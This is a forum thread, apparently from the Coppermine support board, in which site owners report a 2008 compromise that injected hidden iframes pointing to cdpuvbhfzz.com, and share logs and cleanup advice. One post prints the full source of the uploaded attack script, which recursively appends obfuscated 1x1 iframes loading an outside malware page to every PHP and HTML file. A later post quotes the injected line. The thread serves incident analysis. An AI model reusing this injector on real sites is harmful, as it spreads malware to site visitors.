Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?

[htgguy]

I searched and didn't find any reference to this elsewhere on the boards. I just discovered that when I try to access my coppermine gallery in IE7 the page tries to load but hangs up and at the bottom of the window shows that it is trying to redirect to cdpuvbhfzz.com. In Firefox it loads but also says it is contacting this site. I am hosted at 1and1 and have never had any problems like this before. I am not an expert by any means and need to figure out how to correct this or if it presents any threats to visitors of my site. Thanks in advance for any help.

Jim

[Nibbler]

Update your gallery to replace any compromised files.

[htgguy]

Thank you for the reply-is there anywhere I can look to find specific instructions on how to do that? Appreciate any help.

Jim

[tfischer]

Thank you for the reply-is there anywhere I can look to find specific instructions on how to do that? Appreciate any help.

Jim

Sorry your gallery got compromised.  Two warnings thought:  1) if you don't keep CPG up to date, you risk stuff like this happening, and 2) If you don't search before asking questions, people around here tend to respond harshly.

I'll resist the urge to respond harshly but point you to the Announcements forum where you'll find a sticky thread regarding 1.4.16

Good luck
-Tim

[poubao]

I have the same probleme !!!!
Poubao

[Nibbler]

Update instructions are in the manual.

[scratch]

Hi Jim,

I've discovered the same problem with my site this morning.  I upgraded from Coppermine 1.4.12 to 1.4.16, as was suggested on this thread, but that has not resolved the problem.

A quick search on Google seems to suggest that this is a problem that has sprung up over the last few hours, and is affecting a number of websites and bulletin boards. I have contacted my web host, and will wait to see if they have any suggestions.

I'm sorry that your post seems to have been treated fairly dismissively, as though you are a typical newbie who can't be bothered reading the manual.  It would appear your search of the available information on this cdpuvbhfzz.com problem turned up as much as mine did.

Cheers,

David

[Moke]

Htgguy,

My sites have been hacked too with the same code and I am working my way trying go recover them, but a few things that might help others who find this posts as it comes up first in Goolge.

1. The hack is not specific to Coppermine, it simply updates every .php and .html file with its iframe code.

2. Upgrading to newer versions of software on your website only works if every .php and .html file is replaced.

3. I originally stated to manually update the files to remove the code, now  am going through back ups to restore the html and php files.

4. I have no idea how the vandal/criminal/loser who did this managed to update the files, but there is no evidence to suggest it was a lack of having he latest release of Coppermine installed.

Terry

[sharpo]

All my html & php files have been hacked as well. This happened at 17.47 yesterday.

It is not just Coppermine, but phpbb and ordinary web sites that have been affected.

I don't know how this has happened, but it will take ages to sort out with the number of files involved.

[Joachim Müller]

It doesn't make sense to have more reports about possible victims of this attack. What we need to figure out is how the attacker managed to get in - we need to make sure what vulnerability he used to compromise the webspace in the first place.
All who run a heterogenous (mixed) website with many pre-made apps (like Coppermine, phpBB and a load of other pre-made scripts) are not ideal reporters for their issues, as the infection may be related to any of the pre-made apps.
What we could use is a report from someone who was already running cpg1.4.16 (and only coppermine) on his webspace before the infaction happened. If this is the case, you're welcome to come up with a report about the incident. We need additional data for a successfull analysis of the attack: what OS, webserver, environment (shared webhosting vs. root server vs. virtual root server vs. dedicated server), PHP version, mysql version ect. you have been running and since when. Extremely helpfull would be server log files if you have access to them. A forensic image (complete backup of the entire webspace) and a complete db dump before and after the incident) would be helpfull as well.
All who qualify at least for the very first aspect (they had only coppermine in version cpg1.4.16 running before they noticed the infection) are welcome to post here.
Meanwhile I suggest the usual counter-actions for all who have fallen victim of the attack: remain calm, make a complete backup of everything (both files as well as a complete database dump), then clean the files, change all your passwords and report the issue to your webhost. It would be advisable as well to report the website your site has been redirected to (cdpuvbhfzz.com) to your webhost.
Googling for the term "cdpuvbhfzz.com" shows reports from various sites (not only related to coppermine, but phpbb, vbulletin, wordpress, Joomla etc.), so it's likely that the attack is not related to coppermine (although we can't tell for sure at this stage).
The internet storm center doesn't seem to be aware of the search term, and I'm not sure what to search for, as we have so far only seen vague reports - none of the above postings on this issue really qualify as valid reports.

[poubao]

uninstall your plugin "onlinestats", i resolve my probleme with this, and after reinstall all the CPG files and update your gallerie.
I thing the pbm come from onlinestats plugin, PHPBB, and other PHP applications use this kind of mod. (not sure 100%, but it's what i find to resolve my pbm)
poubao
(you must change all your acces password)

[Joachim Müller]

I don't think that onlinestats can be the culprit - please don't issue false alarms without previous discussions. Let's hear the others first who replied to this thread already: did you have onlinestats installed? If yes, what flavor (mod vs. plugin) and what version?

Joachim

[htgguy]

First, thanks for your help with trying to track this down.

I did not have any add ons installed-just the basic Coppermine 1.4.10 package. I do have a blogger site hosted in this directory as well. I am the only user of this site-no one else has the log in information.

Whatever was done to my site has affected all the pages-there are some html pages in the root that also have the iframe code added to them. It would appear that anything that exists in my directory cannot be trusted at this point. Should I be worried about the hundreds of .jpgs that I have on line? If I must I can re-upload them but if they are safe I would prefer to not have to.

Did I do something that has allowed this to happen? Is there any way for me to determine how someone got into my directory and did the damage they did? I don't know if my host messed up, if I messed up, or if someone just brute forced there way into my webspace. Any advice is appreciated.

Jim

[Joachim Müller]

cpg1.4.10 is outdated and contains known security flaws that might have led to your server being vulnerable. Clean up everything, then upgrade. Perform an upgrade of your blog app as well.

[noellisimo]

hey guys,

got the same problem.
the entrance for this hack was "/galerie/thumbnails.php?album=5".

proximate the bummers executed "galerie/update.php" and "/galerie/pluginmgr.php?op=upload" to opload a file ("/galerie/plugins/docs.php".).
this file has following source-code (see below) and runs different operations, whereby the chmods are set to 777 for directories and files.
therefore *.htm and *.php can be updated with an iframe-code that calls the "cdpuvbhfzz.com"-shit.

i got no more time (i got a lot of work) to check the "old" files, so i would be glad, if Joachim Müller could check the named files.

greeting from berlin.

Code:

<?php 
function fileExtension($file) {
    $fileExp = explode('.', $file);
    $filetype = $fileExp[count($fileExp)-1];

return $filetype;
}

function parse($path) {
$dir_array = array();
if ($handle = opendir($path)) {
while (false !== ($file = readdir($handle))) { 
if ($file != "." && $file != "..") { 
$try_dir = $path.$file.'/';
if(is_dir($try_dir)) {
array_push($dir_array, $try_dir);
}
else {
if ($path[strlen($path)-1] != '/') {
$path.= '/';
}
$f_ext = fileExtension($file);
if($f_ext=="php" || $f_ext=="html" || $f_ext=="htm") {
if($file!="debugger.inc.php") {
//chmod($path.$file,0777);
$fhandle = fopen($path.$file, 'a+');
if($f_ext=="php") {
fwrite($fhandle, "<?php echo '<iframe src=\"&#38;#104;&#38;#116;&#38;#116;&#38;#112;&#38;#58;&#38;#47;&#38;#47;&#38;#99;&#38;#100;&#38;#112;&#38;#117;&#38;#118;&#38;#98;&#38;#104;&#38;#102;&#38;#122;&#38;#122;&#38;#46;&#38;#99;&#38;#111;&#38;#109;&#38;#47;&#38;#100;&#38;#108;&#38;#47;&#38;#97;&#38;#100;&#38;#118;&#38;#53;&#38;#57;&#38;#56;&#38;#46;&#38;#112;&#38;#104;&#38;#112;\" width=1 height=1></iframe>'; ?>");
}
else {
fwrite($fhandle, "<iframe src=\"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;\" width=1 height=1></iframe>");
}
fclose($fhandle);
}
}
}
}
}
closedir($handle);
}

return $dir_array;
}

function launch() {
$total = 0;
$last = 1;
$last_num = 0;
$path = $_SERVER['DOCUMENT_ROOT'];
$dirs = array();
array_push($dirs, $path);

while($last) {
$last_num = 0;
for( $j=$total; $j<$total+$last; $j++) {
$temp_dirs = parse($dirs[$j]);
$last_t = sizeof($temp_dirs);
$last_num += $last_t;
for( $i=0; $i<$last_t; $i++) {
array_push($dirs, $temp_dirs[$i]);
}
}
$total += $last;
$last = $last_num;
}
$paths = $_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'];
unlink($paths);

if (is_file($paths)) {
$fhandle = fopen($paths, 'w');
fwrite($fhandle, "<?php echo'Upload plugins here'; ?>");
fclose($fhandle);
}
}

echo "~!";
launch();
?><?php echo '<iframe src="&#38;#104;&#38;#116;&#38;#116;&#38;#112;&#38;#58;&#38;#47;&#38;#47;&#38;#99;&#38;#100;&#38;#112;&#38;#117;&#38;#118;&#38;#98;&#38;#104;&#38;#102;&#38;#122;&#38;#122;&#38;#46;&#38;#99;&#38;#111;&#38;#109;&#38;#47;&#38;#100;&#38;#108;&#38;#47;&#38;#97;&#38;#100;&#38;#118;&#38;#53;&#38;#57;&#38;#56;&#38;#46;&#38;#112;&#38;#104;&#38;#112;" width=1 height=1></iframe>'; ?>

[snowflow]

i had the same problem.
all my files were modiefied with the iframe at 18:40.

this are my logfiles:

[06/Apr/2008:18:39:57 +0200] "GET /galerien/update.php HTTP/1.1" 200 32013 "-" "Mozilla/8.0" 83.237.241.116 - -
[06/Apr/2008:18:39:59 +0200] "POST /galerien/pluginmgr.php?op=upload HTTP/1.1" 302 34309 "-" "Mozilla/8.0" 74.6.8.57 - -

maybe that was thwe attack?

what do you recommend? I disabled the gallery, then I will update the gallery. what can I alos do?

thanks

florian

[sharpo]

I also had that plugin/docs file as mentioned by noellisimo

[dvdvnr]

Additional info found from the hack on our site:

The PHP code (shown in noellisimo's post above) that executed the hack was concealed in a file with a .zip extension and "hidden" in albums/userpics/10001 (where the ohotos normally live). It WASN'T a zip file - it was a PHP file with a .zip extension. So, if you keep getting hacked then look for this file as well. In our case the file name was 142739_298w3.zip but I suspect it can be called anything.

We've removed Coppermine as it seems that it isn't currently safe to have it around!

David

[sharpo]

Additional info found from the hack on our site:

The PHP code (shown in noellisimo's post above) that executed the hack was concealed in a file with a .zip extension and "hidden" in albums/userpics/10001 (where the ohotos normally live). It WASN'T a zip file - it was a PHP file with a .zip extension. So, if you keep getting hacked then look for this file as well. In our case the file name was 142739_298w3.zip but I suspect it can be called anything.

We've removed Coppermine as it seems that it isn't currently safe to have it around!

David

Can't seem to find that, or similar, in any of my albums

[mr.goose]

From my smattering of schoolboy French, it seems similar issues are being reported on the French language forum too.
http://forum.coppermine-gallery.net/index.php/topic,51692.0.html

Sadly so have we. And we're running 1.4.16. Fortunately it seems the damage is limited in our case because we only allow the webserver write-access to a minimal number of files and directories. Meantime I'm downloading our log files and will report again if I find anything that may help the Coppermine Team.

In our case the hack (or whatever it is) also copied a file into our coppermine/albums/userpics/10001 directory. It pretends to be a zip file but it is in fact a php file. I have attached it for analysis. It also attempts to add the following text to the end of any php or html document to which the webserver has write access:-

<?php echo '<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;" width=1 height=1></iframe>'; ?>